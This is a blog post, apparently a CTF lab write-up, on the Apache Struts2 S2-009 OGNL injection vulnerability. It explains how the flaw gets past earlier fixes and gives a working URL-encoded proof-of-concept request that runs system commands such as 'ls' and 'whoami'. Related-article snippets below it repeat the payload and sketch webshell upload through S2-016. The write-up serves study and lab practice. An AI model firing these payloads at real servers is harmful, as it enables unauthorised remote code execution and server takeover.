buuctf [struts2]s2-009

最新推荐文章于 2024-07-16 08:37:37 发布
最新推荐文章于 2024-07-16 08:37:37 发布
阅读量396 收藏
点赞数
分类专栏: buuctf real 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115062002
版权
本文详细解析了Struts2的s2-003和s2-005漏洞,阐述了攻击者如何通过编码手段绕过修复措施执行恶意OGNL表达式。文中提供了一个POC,展示了如何利用这些漏洞执行系统命令并获取环境变量,例如执行'whoami'命令。
摘要由CSDN通过智能技术生成

漏洞描述

这个漏洞跟s2-003 s2-005 属于一套的。
Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。
但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行它,从而绕过官方对#、\等特殊字符的防御

在这里插入图片描述

POC
/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

在这里插入图片描述打印环境变量ENV
在这里插入图片描述
whoami
在这里插入图片描述

exploitsec
关注
专栏目录
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 811
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
Apache Struts2远程代码执行漏洞(S2-009)复现
qq_36933272的博客
09-05 1164
漏洞原理:ognl提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过parametersinterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。parametersinterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,ognl将其作为(top [‘foo’])(0)处理,并将“foo”...
Struts2_009_RCE CVE-2011-3923 漏洞复现
ADummy的博客
02-18 1247
Struts2_009_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ Struts2S2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;后来Struts2S2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGN
struts-s2-009 代码执行 (CVE-2011-3923)
最新发布
qq_23003811的博客
07-16 228
这个漏洞跟s2-003 s2-005 属于一套的。Struts2s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。example=&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防护。通过修改whoami位置达到任意命令执行。
struts-s2-009 代码执行(CVE-2011-3923)
m0_65150886的博客
01-08 565
但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行它,从而绕过官方对#、\等特殊字符的防。Struts2s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。控制整个网站或者服务器。
Apache Struts2远程代码执行漏洞(S2-009)复现总结
qq_45746681的博客
10-07 659
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞成因?二、复现1.环境搭建复现 前言 记录并复现下常见的struts2漏洞,加深理解 一、漏洞成因? 在修补了S2-003和S2-005之后,攻击者又发现了一种新的绕过ParametersInterceptor正则保护的攻击方式 当传入(ONGL)(1)时,会将前者视为ONGL表达式来执行,从而绕过了正则的匹配保护。而且由于其在HTTP参数值中,也可以进一步绕过字符串限制的保护 二、复现 1.环境搭建 因为墨者学院代币
漏洞复现----31、Struts2/S2-009
七天
06-29 741
文章目录一、漏洞原理二、环境搭建三、代码解释四、漏洞复现五、修复方法 一、漏洞原理 Struts2s2-003的修复方法是禁止静态方法调用,在s2-005中可直接通过OGNL绕过该限制,对于#号,同样使用编码\u0023或\43进行绕过;于是Struts2s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.act
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
Struts2 S2-020在Tomcat 8下的命令执行分析1
08-08
Struts2 S2-020 是一个严重的安全漏洞,主要影响使用Apache Struts2框架构建的Web应用程序。该漏洞允许远程攻击者通过OGNL(Object-Graph Navigation Language)表达式执行任意系统命令,从而可能导致拒绝服务(DOS...
漏洞利用EXP windows-kernel-exploits-master.zip
03-10
本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。
墨者学院-Apache Struts2远程代码执行漏洞(S2-009)复现
JimWu的博客
09-04 1553
Apache Struts2远程代码执行漏洞(S2-009)复现 难易程度:★★ 题目类型:命令执行 使用工具:burpsuite、kali 漏洞原理:允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 1.打开靶场,了解S2-009漏洞原理 2.构造poc,执行命令ls,查看文件。...
Struts2 S2-009复现
ZJT6666666的博客
12-21 215
Struts2 S2-009复现
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 582
Apache Struts2远程代码执行漏洞(S2-009)
S2-009 远程代码执行漏洞
EC_Carrot的博客
08-07 2558
漏洞简介 影响版本: 2.1.0 - 2.3.1.1 漏洞复现 在vulhub的环境里,example5.action页面里可以传入name参数,向该参数传入poc即可执行命令: GET /ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowSt
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-009)复现
weixin_42079912的博客
08-09 247
S2-009漏洞原因: OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 在S2-003和S2-005中已经解决了类似的行为,但事实证明,基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。 ParametersIntercept...
s2-009远程代码执行漏洞
Stephen Wolf
11-18 1719
一、漏洞描述 OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 在S2-003和S2-005中已经解决了类似的行为,但事实证明,基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。 ParametersInter...
vulhub-structs2-S2-009 远程代码执行漏洞复现
qq_56426046的博客
06-19 297
影响版本: 2.1.0 - 2.3.1.1。
Struts2 S2-016上传webshell的需求分析
05-25
Struts2 S2-016漏洞是一种文件上传漏洞,攻击者可以通过该漏洞上传恶意代码(如WebShell)到目标服务器,并在服务器上执行该代码,造成严重的安全威胁。 为了成功利用该漏洞,攻击者需要满足以下条件: 1. 目标服务器上安装了Struts2框架。 2. 目标服务器上存在可以上传文件的页面。 3. 目标服务器上存在可以执行上传文件的Action。 因此,攻击者需要进行以下需求分析: 1. 了解目标服务器上是否安装了Struts2框架。 2. 扫描目标服务器,查找可以上传文件的页面。 3. 分析可上传文件的页面中文件上传的代码逻辑。 4. 查找可以执行上传文件的Action。 5. 编写恶意代码,将其伪装成图片或其他常见文件格式,以绕过上传文件类型的限制。 6. 利用漏洞上传恶意代码,并在服务器上执行该代码。 需要注意的是,利用该漏洞进行攻击可能会被追究法律责任,请勿尝试非法入侵。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值